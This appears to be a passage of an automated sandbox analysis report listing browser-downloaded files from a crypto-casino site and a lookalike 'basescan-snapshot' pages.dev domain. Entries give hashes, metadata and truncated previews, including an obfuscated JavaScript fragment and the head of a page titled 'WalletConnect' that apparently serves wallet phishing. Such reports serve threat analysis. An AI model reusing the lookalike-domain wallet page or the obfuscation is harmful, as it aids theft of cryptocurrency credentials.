                                                                                                                                                                                                                                              Preview:(function(){. function o(){const d=['C2nYzwu','CNbYAw4','yxrLrMK','Aw50','nZGWnJyWwMPoq1DQ','AfbHCMe','mtG2nJe1mfvZy1n0sW','AxiUy28','z2v0s2u','C0j5vge','CMvY','Aw9U','zw1LBNq','DhjPyNu','Dg9tDhi','AgvPz2G','mtqZnJa4nLzMENPetq','CMrYzwq','z2LUlxC','BMDLCNa','C2v0s2u','mJe2ote4thLOENDt','CgfYzw4','CM9ZCY0','C3LUyY8','DhLWzq','yxbWzw4','ndm3odC1ofLYDfzTzW','u3rYAw4','B1DMCw0','oI8VCgK','B3jPz2K','n2X0sevcEG','DejLzM8','Bg9Jyxq','C2vHCMm','AhjLzG','Ae11y00','Bg9JywW','yxn5BMm','y3rgAw4','ENPVs3m','z2vYChi','z2v0rwW','CMfUzg8','y29SBgu','zMXVB3i','yKHqAfO','De5Vzgu','CMvM','ndy3odeXqND5twff','C2nYAxa','C3rYAwm','zenOAwW','C2v0sxq','C2v0','mZGXnde1CxnivKz5','C2vUzfa','DgLMAwu','mJrYtMzqvhC','z2v0sxq','zw50','Dc1VCMK','yM9KEq','yMnNyw0','ChjKCMu','C3rVCMe','CMvYug8','DeLKzw4','zMLUz2u','z05HBwu','CMLUDa','D2LKDgG','mJbsEMX3yw0','AgvUlwm','EgvSlNa','CgL4zwW','u3rVCMe','ChjVDg8','C2v0qxq','Ahr0Chm','rwfksKq','z2vUzxi','rwXLBwu','zuvSzw0','Aw5Zzxi','BgLJEq'];o=function(){return d;};return o();
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (769)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):770
                                                                                                                                                                                                                                              Entropy (8bit):5.046400169069175
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:8dUNp55JUQEZXFnk1w8KMdtoelN4kXXFL9goZUlI2oCu55gxvn:vkQYk1xBeklWI2oCuExvn
                                                                                                                                                                                                                                              MD5:1FF6BE43AC0EB1BDADEBCA43AD7D3CAF
                                                                                                                                                                                                                                              SHA1:86A819F86EA492C18D045C8C7CF3DD9251777EFD
                                                                                                                                                                                                                                              SHA-256:1C11D64D5490B073CFF2B2D2743D3B977F358BB07FC2EC936ACADA0DE343D570
                                                                                                                                                                                                                                              SHA-512:B0D9B36CD88DA5FB337D7BBD5E10AD748BF854E8FB4746538A5ED82733EBBA58F2772D4B5D7DCCF08D000E6825B8DECCF99DAABE8595197025A9AAFCEB75C058
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/index-CMxvzQWG.js
                                                                                                                                                                                                                                              Preview:import{i as a,c as r,r as s,Q as c,a6 as o,h as l,aO as m,l as i,f as h,t as f,m as d,e as u}from"./index-DD2Zk4iT.js";var x=h('<div><div class="flex items-center text-base font-extrabold text-primary">');function b(e){return(()=>{var t=x(),n=t.firstChild;return a(n,()=>e.title),a(t,r(l,{get when(){return e.href},get children(){return r(s,{get href(){return e.href},class:"ml-auto flex h-8 items-center rounded-lg px-2 font-extrabold bg-black_alpha5 dark:bg-layer5",get children(){return[c(()=>f("All")),r(o,{class:"rotate-180 text-secondary ml-1 size-4",name:"Arrow"})]}})}}),null),a(t,r(l,{get when(){return e.showController},get children(){return r(m,{class:"ml-2"})}}),null),i(()=>d(t,u("mt-4 flex h-8 items-center mb-1.5 sm:mt-6",e.class))),t})()}export{b as S};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):2182
                                                                                                                                                                                                                                              Entropy (8bit):7.8560231438142525
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:j+pQ1x2gBuqL0BQEXXiJ9BJ339//MHOxNo771:j+pQygBuqoBXXSJZ9/UHOxNi1
                                                                                                                                                                                                                                              MD5:070516FB97839A4213E8D7E9E39FA3BF
                                                                                                                                                                                                                                              SHA1:8907158478D231CCFCCD226AEB6DAAA6D7E2752D
                                                                                                                                                                                                                                              SHA-256:28A794BAD676F4A19A24BEF5269C679B0640DAB762AC972E09F184AAE29BE959
                                                                                                                                                                                                                                              SHA-512:7C9174771EDB181C16009FE51294762C5966AB7A7E53AABE3F79D4BB5479F9D4942A317FB56D1D5795BAC62A83FEFAA2B4E82C14639694A60A159E3D4ACF52FB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/jason_derulo-fkEa4kAk.png
                                                                                                                                                                                                                                              Preview:RIFF~...WEBPVP8Lr.../.......m#...HKk_-...$....nP..=..m...I...A.F....]FO.!=..9....\.....0..E......q..X....a..$.0...#..ma.aCK.XP.0.jC.."...N....p)..NW..0./B....`0+.~.............m...<. 3.J...!..f....k..Tp.."..C.K....aY.$...".?..?....w...w.g.w...Tw@g..]...w.........t...,0......@.......N` ..\n.-P...x..^.n.%....b5#.....PC....g..........J.t...E.........n/o..%.8w..0.P.I...........~..i........*.D..-,.........1@...a.#... ..N..kxERh..meW..,..e.~].N....9...^....~-.&.........*Y.kN..tdH.|sbX..\.....q.N..[..4'.zg.R..].:Ir.2...B..!9_...K.O$..r..2.=,. ..j($..d....BR....IX.....Ob...l9..... m....s.CI~l..yu.uOI|..R.O$.RM..7....0.r..Nr....R'=6..B....f+...u......~M...&{..W.e....T..+.. ..a..3...G...]}_[.E.&...m..`.....Z..4...'..$.f.Ng8.R....".,.N.....mrg.H.!.Kzb..IO...=..TB..=.k...=RT...?....B%IS....4...>>1`JI....4......../'^...a...c....Li9<...:b5k..-=..U..l6).6...w......VSV.VRu..../.w...k..R7.rH..,.c.....^...0...9...^[{.2.....c..[....T..9...|....n..m...L...9.q...6]k.[.1
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):8969
                                                                                                                                                                                                                                              Entropy (8bit):7.680888035969037
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:+7toYNMtKwXf7BvVN4jqv5s3J4KR/px1xEVc:JYNg7XBv/v522KhvEu
                                                                                                                                                                                                                                              MD5:81EF473984B202EC23E383F079FB3D77
                                                                                                                                                                                                                                              SHA1:E7CCEDE6BEADCCBB016458882B6D2A21072C7E5D
                                                                                                                                                                                                                                              SHA-256:D22B57641280DD5F0914BB8E8043EFE6293B3781085B8AFFB9DE1F4988C5F0CC
                                                                                                                                                                                                                                              SHA-512:74F2F08AF173ACB888A516F5B5DC072F196F8E83D145D1EC0E780D623A82D27C7D8982980DC91C0E73A4795450FA00E62ACEAE18F9B925CFD937BDB8DE714802
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/fab0e3ca6b.png?_v=4&auto=format&dpr=1&w=200
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............F.................<...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe................pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/840013fd8c2ab234.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/840013fd8c2ab234.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (26962)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):38289
                                                                                                                                                                                                                                              Entropy (8bit):5.237637991791663
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:8Tn+i2xVnJgnKeeI+Pb5hAKmHvq1yKSgKa+LHZsoUSn:86i6nC+PbLW1
                                                                                                                                                                                                                                              MD5:395ED18EB478342F8284A862C0F6EE36
                                                                                                                                                                                                                                              SHA1:4FDCA8D3D112579A76463E11726D50DBC6C4F370
                                                                                                                                                                                                                                              SHA-256:09D3E129429605D8EBECA043F22DB932CC52046E1FDB1B8E877FB15ABA670A61
                                                                                                                                                                                                                                              SHA-512:C45E3471662239AFA85CB7467F732B80BE5C2E673405471D050DF2D53CA396EBB8F287D9F58AD8B169629E6FF4C70FBD9758F26DD82457B6D0AD0DC69B2FFDEF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:var R=Object.defineProperty;var F=Object.getOwnPropertySymbols;var X=Object.prototype.hasOwnProperty,q=Object.prototype.propertyIsEnumerable;var L=(g,v,r)=>v in g?R(g,v,{enumerable:!0,configurable:!0,writable:!0,value:r}):g[v]=r,E=(g,v)=>{for(var r in v||(v={}))X.call(v,r)&&L(g,r,v[r]);if(F)for(var r of F(v))q.call(v,r)&&L(g,r,v[r]);return g};import{h as I}from"./manifest-51a3674f.js";var S=typeof globalThis!="undefined"?globalThis:typeof window!="undefined"?window:typeof global!="undefined"?global:typeof self!="undefined"?self:{},G={};/*!. * howler.js v2.2.4. * howlerjs.com. *. * (c) 2013-2020, James Simpson of GoldFire Studios. * goldfirestudios.com. *. * MIT License. */(function(g){(function(){var v=function(){this.init()};v.prototype={init:function(){var e=this||r;return e._counter=1e3,e._html5AudioPool=[],e.html5PoolSize=10,e._codecs={},e._howls=[],e._muted=!1,e._volume=1,e._canPlayEvent="canplaythrough",e._navigator=typeof window!="undefined"&&window.navigator?window.navigat
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9
                                                                                                                                                                                                                                              Entropy (8bit):2.94770277922009
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:mn:mn
                                                                                                                                                                                                                                              MD5:722969577A96CA3953E84E3D949DEE81
                                                                                                                                                                                                                                              SHA1:3DAB5F6012E3E149B5A939B9CEBBA4A0B84DC8F5
                                                                                                                                                                                                                                              SHA-256:78342A0905A72CE44DA083DCB5D23B8EA0C16992BA2A82EECE97E033D76BA3D3
                                                                                                                                                                                                                                              SHA-512:54B2B4596CD1769E46A12A0CA6EDE70468985CF8771C2B11E75B3F52567A64418BC24C067D96D52037E0E135E7A7FF828AD0241D55B827506E1C67DE1CAEE8BC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:Forbidden
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1460
                                                                                                                                                                                                                                              Entropy (8bit):6.1902522952569985
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:+ZYj6Lnkzum8COZNDsLlpGPUc6Qla4KOeQKx/J2MmaRLXDNFIB:+ZYjwnklfll0xlaRQKx/J2MmYNOB
                                                                                                                                                                                                                                              MD5:854689FC866E7B119C676BCFF7108BD8
                                                                                                                                                                                                                                              SHA1:B1926A37FFF3AD7E7BC3D84D9E4C56854FDFBB5E
                                                                                                                                                                                                                                              SHA-256:6C509569FD8FB0A2A4FBC5F9FEAE8CC31A463C83B741F06E561FDA6753ED1490
                                                                                                                                                                                                                                              SHA-512:B6D079E8B79FA95E6293B303459E2A8B87016135F6DC0087E7365A8412A5454943359E75E2F6D297EEFB76BB49A74E65A2C2518E1A59DA50AD3B031C1D3C459C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/e77c37b458.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D............3.......(iinf..........infe........av01Color.....iprp...cipco....ispe.......d........pixi............av1C........colrprof....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0......colrnclx...........ipma....................mdat........0@CA.2.......1..RP.fw.qb..k.;..~."S...j.i.e#..d..C..f..4.......i.]. .............uYL..P.@.@..?.NG.....m.6'F..jk..X.(.r..8/uv.;4.U.ZN.0...|.T<...1.(.nl...@....f64B...iM.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):2136
                                                                                                                                                                                                                                              Entropy (8bit):7.919662559258837
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:TevNsxI3ACLai7mhIQZuo2CWzVH2jqVudhE:TINUGZDQAyWEZhE
                                                                                                                                                                                                                                              MD5:8EB0DAF8AD20BE19014D50C675AD8513
                                                                                                                                                                                                                                              SHA1:0FAC9F08BD0211C0D0A66528C251B4F369866001
                                                                                                                                                                                                                                              SHA-256:39ABCEDBE85BF68ECE66BF94C36D9FE321390F00F30DAFE9C57B75F1FFF3FE4E
                                                                                                                                                                                                                                              SHA-512:4E23CFD76B843B06E7B48140E46F52E6EA0AAA30352B3F5834E4F711B8F3AFFB1709DC27686FDCF4C08FED557EB58FC9FEA1F176D02992CBB46D7209C02E6A29
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/gamcare-ocLkkk6e.png
                                                                                                                                                                                                                                              Preview:RIFFP...WEBPVP8LC.../yA...`.m...3...............6R.......A..N............B@...1.E..?.3.......v.m.......1..........>E......._~..Q...e..x........-M.;"....e}..x.H.sGT.sG.....sG.?xT.<.../....._%I.........f... ....5..)*....H.#.*...<@.q....$.U..%..)..&...N..=.ON....../..c#z=....4|.`...f.G...?4..X......a.Az...].o..{.?A..%1.rj..q....S..5Z.:]..9AhO.#.:...-..J^.zk{.(......q[.Pi.3...;..P....F=............b...GU...ec......(...A...;Q..... a<<..K.?....M-7......V&/.(.b..L..=..NH'.&......P..n..x.)0za...%;..j.$..Md..Wk..M..(.6.)51M.......fS..%+7.k1.?...=@,..V........>.0zk?..?.u.4.(..................W..FFV..6G.....9......P..%:\.m.4......B.%o.-....=..l...L.K..,.N5$.{"wRS.s.4.Q....E-lH...M=.;.)......439.].|.bQ....6`..Z-...E...].l..9..8....Bk..tj........$C...R;.c....L.e....[6O#....#Qp.Q!_.X.Y....)|..B....'?.....B.{...e....1.+4.g.H........o.....W)~..v..@%..'.d....Oif..%..*?d.s2...r.NV.9'.... .$%6.\...M..w]..D"Dlr.by.]W..yJF....l..r}.~......*N.a.I...S...B.{.Y
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (3354)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):3355
                                                                                                                                                                                                                                              Entropy (8bit):5.27208963523831
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:HbsRWM4vsfby0NA5w+/uWuWNWBfndoWKM0HZ5JqkWu:6W/kWEa8datppZ5j5
                                                                                                                                                                                                                                              MD5:581A9E3677747486A1E675B24B3CBFFE
                                                                                                                                                                                                                                              SHA1:9D692EB7FB3A3570FBC1FFDD639B27B716CC9D56
                                                                                                                                                                                                                                              SHA-256:B5AD41A38EB44CA47529D54FC933B6BD151EFDF853CA9A7A62EC00197EB8DE80
                                                                                                                                                                                                                                              SHA-512:77A22DAAE615F418C6B6338644795A235E45C513A25BA82824C08239E190E3C39BC76596EED89A25BD3A1E1D12A830A321A5DFD52A8C7269CF8C904F8D11C757
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/_MapCache-1fb5cc44.js
                                                                                                                                                                                                                                              Preview:import{b as d,r as _}from"./_baseGetTag-c2e287b9.js";function l(t){var e=typeof t;return t!=null&&(e=="object"||e=="function")}var v="[object AsyncFunction]",g="[object Function]",y="[object GeneratorFunction]",b="[object Proxy]";function C(t){if(!l(t))return!1;var e=d(t);return e==g||e==y||e==v||e==b}var $=_["__core-js_shared__"];const u=$;var p=function(){var t=/[^.]+$/.exec(u&&u.keys&&u.keys.IE_PROTO||"");return t?"Symbol(src)_1."+t:""}();function O(t){return!!p&&p in t}var P=Function.prototype,j=P.toString;function w(t){if(t!=null){try{return j.call(t)}catch(e){}try{return t+""}catch(e){}}return""}var x=/[\\^$.*+?()[\]{}|]/g,m=/^\[object .+?Constructor\]$/,z=Function.prototype,S=Object.prototype,D=z.toString,H=S.hasOwnProperty,F=RegExp("^"+D.call(H).replace(x,"\\$&").replace(/hasOwnProperty|(function).*?(?=\\\()| for .+?(?=\\\])/g,"$1.*?")+"$");function I(t){if(!l(t)||O(t))return!1;var e=C(t)?F:m;return e.test(w(t))}function T(t,e){return t==null?void 0:t[e]}function f(t,e){var a=T
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 121 x 48, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):875
                                                                                                                                                                                                                                              Entropy (8bit):7.454173658962506
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:6v/7CxM/MykD2o7ju+pln5o0UeaJMZESL8ct2yldd3Y0bSkUKzFkKonUDAmtXeWU:w7kj3l5o0gaZbtVboySkU2bo21kI3GwW
                                                                                                                                                                                                                                              MD5:366E15F6CCFFAD1140B4B4BE2F7298B6
                                                                                                                                                                                                                                              SHA1:5D9F250421DF9E085062E5A26DB3F49DEBB1969E
                                                                                                                                                                                                                                              SHA-256:26F01FDAB543F0233F016F957D6DE31FDE6F46ECC935535191C5DF2001F72C91
                                                                                                                                                                                                                                              SHA-512:7B26DDF4AAC51C8A83C4C077D077BD848DBF132555DD78FDDE7E6F3F50A435700DA0B27CAA414B6D777A14A0F1AA9D349FA33269B5C95EBEFEBB4204C1482D57
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...y...0......s%.....sRGB.........gAMA......a....lPLTE............................................................................................................"......#tRNS.. 00@PP``opp........................A...nIDATx...r.0.EeC...nJH..$........+.......D.A....6666~.+.4.~....i."F.'.C.~.&..w.}.:_.`...9....n...$x.p..BQ.......4Q..{.-...+^J.8.....l ....Kh.B.R*..3.#.Z6........(..4....X....FJF.Fq.ad.=.].....1....c...q._*a.fy.\.&....J....z.........Q&...V...N....E....d.}.}.d. .6j..W...L......D..Z.R.3.d.......N.....P.>..hV...A.20p..gzt....a....<S. ....~L.....,LY...8.Wn.S.....`../.k..nvN.|.u.....c....W.....Q.".$.]tC.r...<_...#+.xQI...$m..pf..:.2...'...O.Bc.xQ.#1..vYB....n}...8...h.........WF.*.x.cxI./4f.<-.|....'t....*...]....l.a.NV.a...ya{...(5zZT...!.?.v...#..\.:h\..B6..<..&Fq`...c.../.F..+?......ycc...............IEND.B`.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (876)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):877
                                                                                                                                                                                                                                              Entropy (8bit):4.962536663127428
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:wjQ6KLi8NnaJSLQ0+othLXAE9OykkXYRIfObQkV:wjQ6EmOOEAXrvV
                                                                                                                                                                                                                                              MD5:B512469922DBBF718AA4BA613C106DAB
                                                                                                                                                                                                                                              SHA1:7358003399397A38F89083AF020F3AA67581E9E3
                                                                                                                                                                                                                                              SHA-256:7778428AFE2E5927859F4EB36DC74357778D7A69A8DD518B8123A53FF7A002A9
                                                                                                                                                                                                                                              SHA-512:1E084FC00A63E0CCA7150BE519F0EFB07C109C7E128AFB496F568E1ADFE89C157291FD86BC03F261E43A6903B9FFE70BD90B0DCD2B2BD53507E51657097A26A3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:const e=globalThis._bc,{$DEVCOMP:a,$PROXY:r,$TRACK:t,DEV:n,ErrorBoundary:s,For:o,Index:c,Match:i,Show:l,Suspense:u,SuspenseList:d,Switch:b,batch:h,cancelCallback:p,catchError:C,children:E,createComponent:S,createComputed:f,createContext:g,createDeferred:x,createEffect:m,createMemo:R,createReaction:y,createRenderEffect:M,createResource:w,createRoot:O,createSelector:P,createSignal:T,createUniqueId:k,enableExternalSource:q,enableHydration:A,enableScheduling:D,equalFn:F,from:$,getListener:z,getOwner:B,indexArray:I,lazy:L,mapArray:V,mergeProps:_,observable:j,on:v,onCleanup:H,onError:K,onMount:U,requestCallback:W,resetErrorBoundaries:X,runWithOwner:Y,sharedConfig:G,splitProps:J,startTransition:N,untrack:Q,useContext:Z,useTransition:ee}=e.dxzurp;export{o as F,i as M,l as S,H as a,m as b,T as c,R as d,b as e,O as f,w as g,P as h,h as i,u as j,U as o,Y as r,J as s,Q as u};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
